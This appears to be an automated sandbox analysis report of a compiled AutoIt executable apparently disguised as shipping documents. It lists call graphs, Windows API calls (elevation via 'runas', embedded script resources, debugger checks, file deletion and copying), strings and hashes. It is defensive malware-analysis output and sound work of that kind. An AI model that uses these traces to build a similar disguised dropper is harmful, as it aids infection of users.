100450->100292 100451->100302 100452->100273 100453->100293 100454->100293 100455->100275 100456->100282 100457->100275 100459 699997 84 API calls 100458->100459 100460 70ce2e 100459->100460 100479 70ce75 Mailbox 100460->100479 100496 70dab9 100460->100496 100462 70d0cd 100463 70d242 100462->100463 100467 70d0db 100462->100467 100535 70dbdc 92 API calls Mailbox 100463->100535 100466 70d251 100466->100467 100469 70d25d 100466->100469 100509 70cc82 100467->100509 100468 699997 84 API calls 100486 70cec6 Mailbox 100468->100486 100469->100479 100474 70d114 100524 6b0e48 100474->100524 100477 70d147 100481 69942e 59 API calls 100477->100481 100478 70d12e 100530 6fa0b5 89 API calls 4 library calls 100478->100530 100479->100311 100483 70d153 100481->100483 100482 70d139 GetCurrentProcess TerminateProcess 100482->100477 100484 6991b0 59 API calls 100483->100484 100485 70d169 100484->100485 100494 70d190 100485->100494 100531 698ea0 59 API calls Mailbox 100485->100531 100486->100462 100486->100468 100486->100479 100528 6ff835 59 API calls 2 library calls 100486->100528 100529 70d2f3 61 API calls 2 library calls 100486->100529 100488 70d2b8 100488->100479 100492 70d2cc FreeLibrary 100488->100492 100489 70d17f 100532 70d95d 107 API calls _free 100489->100532 100492->100479 100494->100488 100533 698ea0 59 API calls Mailbox 100494->100533 100534 699e9c 60 API calls Mailbox 100494->100534 100536 70d95d 107 API calls _free 100494->100536 100497 697faf 59 API calls 100496->100497 100498 70dad4 CharLowerBuffW 100497->100498 100537 6ef658 100498->100537 100502 6977c7 59 API calls 100503 70db0d 100502->100503 100504 6979ab 59 API calls 100503->100504 100505 70db24 100504->100505 100507 697e8c 59 API calls 100505->100507 100506 70db6c Mailbox 100506->100486 100508 70db30 Mailbox 100507->100508 100508->100506 100544 70d2f3 61 API calls 2 library calls 100508->100544 100510 70cc9d 100509->100510 100514 70ccf2 100509->100514 100511 6b0ff6 Mailbox 59 API calls 100510->100511 100512 70ccbf 
100511->100512 100513 6b0ff6 Mailbox 59 API calls 100512->100513 100512->100514 100513->100512 100515 70dd64 100514->100515 100516 70df8d Mailbox 100515->100516 100523 70dd87 _strcat _wcscpy __NMSG_WRITE 100515->100523 100516->100474 100517 699c9c 59 API calls 100517->100523 100518 699cf8 59 API calls 100518->100523 100519 699d46 59 API calls 100519->100523 100520 699997 84 API calls 100520->100523 100521 6b594c 58 API calls _W_store_winword 100521->100523 100523->100516 100523->100517 100523->100518 100523->100519 100523->100520 100523->100521 100547 6f5b29 61 API calls 2 library calls 100523->100547 100525 6b0e5d 100524->100525 100526 6b0ef5 VirtualAlloc 100525->100526 100527 6b0ec3 100525->100527 100526->100527 100527->100477 100527->100478 100528->100486 100529->100486 100530->100482 100531->100489 100532->100494 100533->100494 100534->100494 100535->100466 100536->100494 100538 6ef683 __NMSG_WRITE 100537->100538 100539 6ef6c2 100538->100539 100542 6ef6b8 100538->100542 100543 6ef769 100538->100543 100539->100502 100539->100508 100542->100539 100545 697a24 61 API calls 100542->100545 100543->100539 100546 697a24 61 API calls 100543->100546 100544->100506 100545->100542 100546->100543 100547->100523 100548->100316 100549->100361 100550->100319 100551->100323 100552->100358 100553->100358 100555 6956dd 100554->100555 100556 695702 100554->100556 100555->100556 100560 6956ec 100555->100560 100557 697eec 59 API calls 100556->100557 100561 6f349a 100557->100561 100558 6f34c9 100558->100393 100562 695c18 59 API calls 100560->100562 100561->100558 100578 6f3436 ReadFile SetFilePointerEx 100561->100578 100579 697a84 59 API calls 2 library calls 100561->100579 100563 6f35ba 100562->100563 100565 695632 61 API calls 100563->100565 100566 6f35c8 100565->100566 100568 6f35d8 Mailbox 100566->100568 100580 69793a 61 API calls Mailbox 100566->100580 100568->100393 100569->100368 100570->100397 100571->100398 100572->100369 100573->100369 100574->100375 100575->100383 
100576->100391 100577->100396 100578->100561 100579->100561 100580->100568 100581->100433 100582->100412 100584 6e665e 100583->100584 100585 6e6641 100583->100585 100584->100442 100585->100584 100587 6e6621 59 API calls Mailbox 100585->100587 100587->100585 100588 6d0226 100594 69ade2 Mailbox 100588->100594 100590 6d0c86 100591 6e66f4 Mailbox 59 API calls 100590->100591 100592 6d0c8f 100591->100592 100593 699df0 Mailbox 59 API calls 100593->100594 100594->100590 100594->100592 100594->100593 100595 6d00e0 VariantClear 100594->100595 100596 69b6c1 100594->100596 100598 70e237 130 API calls 100594->100598 100599 6a2123 95 API calls 100594->100599 100600 6fd2e6 101 API calls 100594->100600 100601 70e24b 130 API calls 100594->100601 100602 70474d 331 API calls 100594->100602 100603 6e7405 59 API calls 100594->100603 100595->100594 100604 6fa0b5 89 API calls 4 library calls 100596->100604 100598->100594 100599->100594 100600->100594 100601->100594 100602->100594 100603->100594 100604->100590 100605 691055 100610 692649 100605->100610 100608 6b2f80 __cinit 67 API calls 100609 691064 100608->100609 100611 6977c7 59 API calls 100610->100611 100612 6926b7 100611->100612 100617 693582 100612->100617 100615 692754 100616 69105a 100615->100616 100620 693416 59 API calls 2 library calls 100615->100620 100616->100608 100621 6935b0 100617->100621 100620->100615 100622 6935bd 100621->100622 100623 6935a1 100621->100623 100622->100623 100624 6935c4 RegOpenKeyExW 100622->100624 100623->100615 100624->100623 100625 6935de RegQueryValueExW 100624->100625 100626 6935ff 100625->100626 100627 693614 RegCloseKey 100625->100627 100626->100627 100627->100623 100628 691066 100633 69f8cf 100628->100633 100630 69106c 100631 6b2f80 __cinit 67 API calls 100630->100631 100632 691076 100631->100632 100634 69f8f0 100633->100634 100666 6b0143 100634->100666 100638 69f937 100639 6977c7 59 API calls 100638->100639 100640 69f941 100639->100640 100641 6977c7 59 API calls 100640->100641 100642 69f94b 
100641->100642 100643 6977c7 59 API calls 100642->100643 100644 69f955 100643->100644 100645 6977c7 59 API calls 100644->100645 100646 69f993 100645->100646 100647 6977c7 59 API calls 100646->100647 100648 69fa5e 100647->100648 100676 6a60e7 100648->100676 100652 69fa90 100653 6977c7 59 API calls 100652->100653 100654 69fa9a 100653->100654 100704 6affde 100654->100704 100656 69fae1 100657 69faf1 GetStdHandle 100656->100657 100658 69fb3d 100657->100658 100659 6d49d5 100657->100659 100660 69fb45 OleInitialize 100658->100660 100659->100658 100661 6d49de 100659->100661 100660->100630 100711 6f6dda 64 API calls Mailbox 100661->100711 100663 6d49e5 100712 6f74a9 CreateThread 100663->100712 100665 6d49f1 CloseHandle 100665->100660 100713 6b021c 100666->100713 100669 6b021c 59 API calls 100670 6b0185 100669->100670 100671 6977c7 59 API calls 100670->100671 100672 6b0191 100671->100672 100673 697d2c 59 API calls 100672->100673 100674 69f8f6 100673->100674 100675 6b03a2 6 API calls 100674->100675 100675->100638 100677 6977c7 59 API calls 100676->100677 100678 6a60f7 100677->100678 100679 6977c7 59 API calls 100678->100679 100680 6a60ff 100679->100680 100720 6a5bfd 100680->100720 100683 6a5bfd 59 API calls 100684 6a610f 100683->100684 100685 6977c7 59 API calls 100684->100685 100686 6a611a 100685->100686 100687 6b0ff6 Mailbox 59 API calls 100686->100687 100688 69fa68 100687->100688 100689 6a6259 100688->100689 100690 6a6267 100689->100690 100691 6977c7 59 API calls 100690->100691 100692 6a6272 100691->100692 100693 6977c7 59 API calls 100692->100693 100694 6a627d 100693->100694 100695 6977c7 59 API calls 100694->100695 100696 6a6288 100695->100696 100697 6977c7 59 API calls 100696->100697 100698 6a6293 100697->100698 100699 6a5bfd 59 API calls 100698->100699 100700 6a629e 100699->100700 100701 6b0ff6 Mailbox 59 API calls 100700->100701 100702 6a62a5 RegisterWindowMessageW 100701->100702 100702->100652 100705 6affee 100704->100705 100706 6e5cc3 100704->100706 100707 6b0ff6 
Mailbox 59 API calls 100705->100707 100723 6f9d71 60 API calls 100706->100723 100710 6afff6 100707->100710 100709 6e5cce 100710->100656 100711->100663 100712->100665 100724 6f748f 65 API calls 100712->100724 100714 6977c7 59 API calls 100713->100714 100715 6b0227 100714->100715 100716 6977c7 59 API calls 100715->100716 100717 6b022f 100716->100717 100718 6977c7 59 API calls 100717->100718 100719 6b017b 100718->100719 100719->100669 100721 6977c7 59 API calls 100720->100721 100722 6a5c05 100721->100722 100722->100683 100723->100709 100725 691016 100730 694ad2 100725->100730 100728 6b2f80 __cinit 67 API calls 100729 691025 100728->100729 100731 6b0ff6 Mailbox 59 API calls 100730->100731 100732 694ada 100731->100732 100733 69101b 100732->100733 100737 694a94 100732->100737 100733->100728 100738 694a9d 100737->100738 100739 694aaf 100737->100739 100740 6b2f80 __cinit 67 API calls 100738->100740 100741 694afe 100739->100741 100740->100739 100742 6977c7 59 API calls 100741->100742 100743 694b16 GetVersionExW 100742->100743 100744 697d2c 59 API calls 100743->100744 100745 694b59 100744->100745 100746 697e8c 59 API calls 100745->100746 100749 694b86 100745->100749 100747 694b7a 100746->100747 100748 697886 59 API calls 100747->100748 100748->100749 100750 6cdc8d 100749->100750 100751 694bf1 GetCurrentProcess IsWow64Process 100749->100751 100752 694c0a 100751->100752 100753 694c89 GetSystemInfo 100752->100753 100754 694c20 100752->100754 100755 694c56 100753->100755 100765 694c95 100754->100765 100755->100733 100758 694c7d GetSystemInfo 100760 694c47 100758->100760 100759 694c32 100761 694c95 2 API calls 100759->100761 100760->100755 100762 694c4d FreeLibrary 100760->100762 100763 694c3a GetNativeSystemInfo 100761->100763 100762->100755 100763->100760 100766 694c2e 100765->100766 100767 694c9e LoadLibraryA 100765->100767 100766->100758 100766->100759 100767->100766 100768 694caf GetProcAddress 100767->100768 100768->100766 100769 69e736 100772 69d260 100769->100772 100771 
69e744 100773 69d27d 100772->100773 100801 69d4dd 100772->100801 100774 6d2abb 100773->100774 100775 6d2b0a 100773->100775 100804 69d2a4 100773->100804 100776 6d2abe 100774->100776 100786 6d2ad9 100774->100786 100816 70a6fb 331 API calls __cinit 100775->100816 100779 6d2aca 100776->100779 100776->100804 100814 70ad0f 331 API calls 100779->100814 100782 6b2f80 __cinit 67 API calls 100782->100804 100783 69d594 100808 698bb2 68 API calls 100783->100808 100784 6d2cdf 100784->100784 100785 69d6ab 100785->100771 100786->100801 100815 70b1b7 331 API calls 3 library calls 100786->100815 100790 6d2c26 100820 70aa66 89 API calls 100790->100820 100791 69d5a3 100791->100771 100794 698620 69 API calls 100794->100804 100801->100785 100821 6fa0b5 89 API calls 4 library calls 100801->100821 100802 69a000 331 API calls 100802->100804 100803 6981a7 59 API calls 100803->100804 100804->100782 100804->100783 100804->100785 100804->100790 100804->100794 100804->100801 100804->100802 100804->100803 100806 6988a0 68 API calls __cinit 100804->100806 100807 6986a2 68 API calls 100804->100807 100809 69859a 68 API calls 100804->100809 100810 69d0dc 331 API calls 100804->100810 100811 699f3a 59 API calls Mailbox 100804->100811 100812 69d060 89 API calls 100804->100812 100813 69cedd 331 API calls 100804->100813 100817 698bb2 68 API calls 100804->100817 100818 699e9c 60 API calls Mailbox 100804->100818 100819 6e6d03 60 API calls 100804->100819 100806->100804 100807->100804 100808->100791 100809->100804 100810->100804 100811->100804 100812->100804 100813->100804 100814->100785 100815->100801 100816->100804 100817->100804 100818->100804 100819->100804 100820->100801 100821->100784

Control-flow Graph

APIs
• GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00693B7A
• IsDebuggerPresent.KERNEL32 ref: 00693B8C
• GetFullPathNameW.KERNEL32(00007FFF,?,?,007562F8,007562E0,?,?), ref: 00693BFD
  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
  • Part of subcall function 006A0A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00693C26,007562F8,?,?,?), ref: 006A0ACE
• SetCurrentDirectoryW.KERNEL32(?), ref: 00693C81
• MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007493F0,00000010), ref: 006CD4BC
• SetCurrentDirectoryW.KERNEL32(?,007562F8,?,?,?), ref: 006CD4F4
• GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00745D40,007562F8,?,?,?), ref: 006CD57A
• ShellExecuteW.SHELL32(00000000,?,?), ref: 006CD581
  • Part of subcall function 00693A58: GetSysColorBrush.USER32(0000000F), ref: 00693A62
  • Part of subcall function 00693A58: LoadCursorW.USER32(00000000,00007F00), ref: 00693A71
  • Part of subcall function 00693A58: LoadIconW.USER32(00000063), ref: 00693A88
  • Part of subcall function 00693A58: LoadIconW.USER32(000000A4), ref: 00693A9A
  • Part of subcall function 00693A58: LoadIconW.USER32(000000A2), ref: 00693AAC
  • Part of subcall function 00693A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00693AD2
  • Part of subcall function 00693A58: RegisterClassExW.USER32(?), ref: 00693B28
  • Part of subcall function 006939E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00693A15
                                                  • Part of subcall function 006939E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00693A36
                                                  • Part of subcall function 006939E7: ShowWindow.USER32(00000000,?,?), ref: 00693A4A
                                                  • Part of subcall function 006939E7: ShowWindow.USER32(00000000,?,?), ref: 00693A53
                                                  • Part of subcall function 006943DB: _memset.LIBCMT ref: 00694401
                                                  • Part of subcall function 006943DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 006944A6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                • String ID: This is a third-party compiled AutoIt script.$runas$%r
                                                • API String ID: 529118366-374001893
                                                • Opcode ID: e1c5c1107b4051c57419013049cd2e2941550367ef1bc6de03f5d72db9654c24
                                                • Instruction ID: e6e3811b09d06b7770718add07cdf2e1b6a978c3c7bcd66af195e3a688b5e091
                                                • Opcode Fuzzy Hash: e1c5c1107b4051c57419013049cd2e2941550367ef1bc6de03f5d72db9654c24
                                                • Instruction Fuzzy Hash: BC51F970904248AACF51EBB4DC05EFD7B7EBF05701F40817DF815A36A1DAB85A46CB29

                                                Control-flow Graph

                                                APIs
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00694EEE,?,?,00000000,00000000), ref: 00694FF9
                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00694EEE,?,?,00000000,00000000), ref: 00695010
                                                • LoadResource.KERNEL32(?,00000000,?,?,00694EEE,?,?,00000000,00000000,?,?,?,?,?,?,00694F8F), ref: 006CDD60
                                                • SizeofResource.KERNEL32(?,00000000,?,?,00694EEE,?,?,00000000,00000000,?,?,?,?,?,?,00694F8F), ref: 006CDD75
                                                • LockResource.KERNEL32(Ni,?,?,00694EEE,?,?,00000000,00000000,?,?,?,?,?,?,00694F8F,00000000), ref: 006CDD88
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                • String ID: SCRIPT$Ni
                                                • API String ID: 3051347437-3595334624
                                                • Opcode ID: 1efb44215f06ee4ad8d41ecf30f3e5404798dc270e02e1def0afbb45c1f25e21
                                                • Instruction ID: c0232889ff79416fc621e1758d86f67550d48cbfb66bfdabcb10c43f911a8c8a
                                                • Opcode Fuzzy Hash: 1efb44215f06ee4ad8d41ecf30f3e5404798dc270e02e1def0afbb45c1f25e21
                                                • Instruction Fuzzy Hash: EE115E75240700AFDB218B69DC58FAB7BBEEBC9B11F10816CF406C66A0DB75E8018660

                                                Control-flow Graph

                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 00694B2B
                                                  • Part of subcall function 00697D2C: _memmove.LIBCMT ref: 00697D66
                                                • GetCurrentProcess.KERNEL32(?,0071FAEC,00000000,00000000,?), ref: 00694BF8
                                                • IsWow64Process.KERNEL32(00000000), ref: 00694BFF
                                                • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00694C45
                                                • FreeLibrary.KERNEL32(00000000), ref: 00694C50
                                                • GetSystemInfo.KERNEL32(00000000), ref: 00694C81
                                                • GetSystemInfo.KERNEL32(00000000), ref: 00694C8D
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                • String ID:
                                                • API String ID: 1986165174-0
                                                • Opcode ID: 5afb69325aa436f91ffd7c0d922f7730cd1f4f74af981271783f68d5f57da540
                                                • Instruction ID: baf1c58bf0b442ecc410c0e884477d6aa0ed512fa1ff918a1b840ca32062a45d
                                                • Opcode Fuzzy Hash: 5afb69325aa436f91ffd7c0d922f7730cd1f4f74af981271783f68d5f57da540
                                                • Instruction Fuzzy Hash: 7091D63154A7C4DECB31DB688451AEAFFEAAF25300B448DADD0CB93F41D624E909D719
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Dtu$Dtu$Dtu$Dtu$Variable must be of type 'Object'.
                                                • API String ID: 0-2845289861
                                                • Opcode ID: 048d068c4c36ebcbea7efe615dd08c01f45e53663f7a7fd02bd16168594f0467
                                                • Instruction ID: 109a69a1ad78c8f5db55f6ad8200de41c5fc1d1fda61e28241dce8cd1c1af270
                                                • Opcode Fuzzy Hash: 048d068c4c36ebcbea7efe615dd08c01f45e53663f7a7fd02bd16168594f0467
                                                • Instruction Fuzzy Hash: 2AA27B74A04205CFCF24CF98C580AA9B7BBFF58304F25806AE916AB751D776ED42CB91
                                                APIs
                                                • GetFileAttributesW.KERNELBASE(?,006CE7C1), ref: 006F46A6
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 006F46B7
                                                • FindClose.KERNEL32(00000000), ref: 006F46C7
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirst
                                                • String ID:
                                                • API String ID: 48322524-0
                                                • Opcode ID: 47c5c7f36bfe3f83edfe4e84ebff3390f9584f2e1358abe3fa59c89816c14140
                                                • Instruction ID: d4e4076a32fa2d9cb2a682a6e4e28a4b39f2df5c2e7328ccbb2bf8dd5804bb79
                                                • Opcode Fuzzy Hash: 47c5c7f36bfe3f83edfe4e84ebff3390f9584f2e1358abe3fa59c89816c14140
                                                • Instruction Fuzzy Hash: DAE0D8314104055B4610673CEC4D4FF775D9F06335F108715FA35C15E0EBB459508599
                                                APIs
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A0BBB
                                                • timeGetTime.WINMM ref: 006A0E76
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006A0FB3
                                                • TranslateMessage.USER32(?), ref: 006A0FC7
                                                • DispatchMessageW.USER32(?), ref: 006A0FD5
                                                • Sleep.KERNEL32(0000000A), ref: 006A0FDF
                                                • LockWindowUpdate.USER32(00000000,?,?), ref: 006A105A
                                                • DestroyWindow.USER32 ref: 006A1066
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006A1080
                                                • Sleep.KERNEL32(0000000A,?,?), ref: 006D52AD
                                                • TranslateMessage.USER32(?), ref: 006D608A
                                                • DispatchMessageW.USER32(?), ref: 006D6098
                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 006D60AC
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: Message$DispatchPeekSleepTranslateWindow$DestroyLockTimeUpdatetime
                                                • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID$pru$pru$pru$pru
                                                • API String ID: 4003667617-3117017571
                                                • Opcode ID: c05b3a1b0ff0f10862aedbec5304dec386b9b11eb16b7dd9513e3d36a54993ea
                                                • Instruction ID: 8cb32180574a9bec3bdb7653c41e2e80fc0fb0a998a9b51e6633be860fe31686
                                                • Opcode Fuzzy Hash: c05b3a1b0ff0f10862aedbec5304dec386b9b11eb16b7dd9513e3d36a54993ea
                                                • Instruction Fuzzy Hash: 5EB2D170A08741DFDB24DF24C884BAAB7E6BF85304F14891EE44A877A1DB75EC45CB86

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 006F91E9: __time64.LIBCMT ref: 006F91F3
                                                  • Part of subcall function 00695045: _fseek.LIBCMT ref: 0069505D
                                                • __wsplitpath.LIBCMT ref: 006F94BE
                                                  • Part of subcall function 006B432E: __wsplitpath_helper.LIBCMT ref: 006B436E
                                                • _wcscpy.LIBCMT ref: 006F94D1
                                                • _wcscat.LIBCMT ref: 006F94E4
                                                • __wsplitpath.LIBCMT ref: 006F9509
                                                • _wcscat.LIBCMT ref: 006F951F
                                                • _wcscat.LIBCMT ref: 006F9532
                                                  • Part of subcall function 006F922F: _memmove.LIBCMT ref: 006F9268
                                                  • Part of subcall function 006F922F: _memmove.LIBCMT ref: 006F9277
                                                • _wcscmp.LIBCMT ref: 006F9479
                                                  • Part of subcall function 006F99BE: _wcscmp.LIBCMT ref: 006F9AAE
                                                  • Part of subcall function 006F99BE: _wcscmp.LIBCMT ref: 006F9AC1
                                                • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 006F96DC
                                                • _wcsncpy.LIBCMT ref: 006F974F
                                                • DeleteFileW.KERNEL32(?,?), ref: 006F9785
                                                • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 006F979B
                                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006F97AC
                                                • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 006F97BE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                • String ID:
                                                • API String ID: 1500180987-0
                                                • Opcode ID: d56cb253b2209ea3a40e15a26dc0d0522a2c26404c7df566ca2d898e67ce15c6
                                                • Instruction ID: 1513e7f314fb2123951337199c3b1082144f3d887adf3fabc1da6491cec649c9
                                                • Opcode Fuzzy Hash: d56cb253b2209ea3a40e15a26dc0d0522a2c26404c7df566ca2d898e67ce15c6
                                                • Instruction Fuzzy Hash: F6C11DB1D0021DAADF51DF95CC85EEEB7BEAF45300F0040AAF609E7151DB709A858F69

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00693074
                                                • RegisterClassExW.USER32(00000030), ref: 0069309E
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006930AF
                                                • InitCommonControlsEx.COMCTL32(?), ref: 006930CC
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006930DC
                                                • LoadIconW.USER32(000000A9), ref: 006930F2
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00693101
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1257490900.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                                                • Associated: 00000000.00000002.1257173350.0000000000690000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.000000000071F000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257573091.0000000000745000.00000002.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257622033.000000000074F000.00000004.00000001.01000000.00000003.sdmp
                                                • Associated: 00000000.00000002.1257642733.0000000000758000.00000002.00000001.01000000.00000003.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_690000_Documente de expediere.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: 9d69c732df83d017500fb56be1860ad0807d3e59711d211db974240723b33857
                                                • Instruction ID: 1d5e5c2e1c9e70ac02c5c75cb7ad2fc1767030f68961a4c31378e1ca6101118f
                                                • Opcode Fuzzy Hash: 9d69c732df83d017500fb56be1860ad0807d3e59711d211db974240723b33857
                                                • Instruction Fuzzy Hash: EF3158B1841308AFDB00DFA8D889AD9BBF0FB09320F14C16EE540EB2A1D7BA5541CF94

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00693074
                                                • RegisterClassExW.USER32(00000030), ref: 0069309E
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006930AF
